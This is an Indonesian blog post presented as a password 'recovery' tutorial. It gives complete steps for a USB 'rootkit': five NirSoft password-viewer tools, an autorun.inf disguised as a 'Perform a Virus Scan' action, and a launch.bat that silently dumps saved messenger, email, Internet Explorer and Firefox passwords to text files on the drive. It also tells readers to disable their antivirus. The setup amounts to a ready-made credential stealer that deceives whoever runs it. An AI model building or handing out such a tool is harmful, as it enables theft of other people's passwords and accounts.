Minggu, 31 Januari 2016

Cara recovery (memulihkan) password dengan flashdisk

Cara recovery (memulihkan) password yang ampuh. Gunakan tool ini untuk recovery (memulihkan) password anda yang lupa/hilang dengan membuat rootkit sendiri pada USB flashdisk. Dengan download beberapa file berikut, lalu anda pindah di flashdisk selanjutnya dapat digunakan untuk memulihkan password anda yang hilang berikut cara lengkap recovery (memulihkan) password yang sukses.

Cara recovery (memulihkan) password yang sukses ada beberapa tahap yang harus anda lakukan. Kita butuh beberapa file exe yang bisa anda download di link berikut. Ukurannya sangat kecil jadi tidak butuh waktu banyak. Silakan download semua filenya lalu ikuti langkah untuk membuat rootkit sendiri di flashdisk dan bisa untuk recovery password dengan benar.


MessenPass
Download :http://www.nirsoft.net/utils/mspass.html
Untuk recover password pada Instant Messenger seperti: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger, Trillian, Miranda, dan Gaim.

Mail PassView
Download :http://www.nirsoft.net/utils/mailpv.html
Untuk merecovery password dari program email: Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird dan Group Mail lainnya.

IE Passview
Download  :http://www.nirsoft.net/utils/internet_explorer_password.html
Untuk merecovery password dari browser Internet Explorer, support di Explorer 7.0, versi  v4.0 – v6.0.

Protected Storage PassView :
Download :http://www.nirsoft.net/utils/pspv.html
Untuk merecovery password yang tersimpan di Protected Storage + AutoComplete password Internet Explorer, password dari situs yang dilindungi sandi, MSN Explorer Sandi dll.

PasswordFox :
Download :http://www.nirsoft.net/utils/passwordfox.html
Untk memulihkan password yang mampu melihat nama pengguna dan sandi yang disimpan oleh browser Mozilla Firefox. Secara default, PasswordFox menampilkan password yang disimpan dalam profil, tetapi disini Anda dapat melihat password Firefox di lain profil yang ada.

Langkah membuat  toolkit dalam USB Flashdisk:

CATATAN: Nonaktifkan sementara antivirus Anda.
1. Ekstrak ke 5 tools di atas lalu copy file exe -nya saja ke Flashdisk anda yakni: mspass.exe, mailpv.exe, iepv.exe, pspv.exe dan passwordfox.exe.

2. Buka Notepad dan copas teks berikut:
 [autorun]
 open=launch.bat
 ACTION= Perform a Virus Scan

3. Simpan Notepad dan ganti nama + ekstensi .txt menjadi autorun.inf, kemudian
 copy file autorun.inf ke dalam USB flashdisk.

4. Buka Notepad baru lagi dan copas teks berikut:
 start mspass.exe /stext mspass.txt
 start mailpv.exe /stext mailpv.txt
 start iepv.exe /stext iepv.txt
 start pspv.exe /stext pspv.txt
 start passwordfox.exe /stext passwordfox.txt

5. Simpan file Notepad tsb, dengan ganti namanya dari New Text Document.txt menjadi launch.bat, lalu copas file launch.bat USB flashdisk.
Langkah selesai, rootkit siap di gunakan untuk merecovery password.

Menurut pengalaman saya tools ini bekerja baik pada Windows 2000, XP, Vista dan 7 dan untuk windows lain saya belum mencobanya. Silakan dicoba dulu dan mudah-mudahan bermanfaat, sekian Cara recovery (memulihkan) password dengan flashdisk.

Tidak ada komentar:

Posting Komentar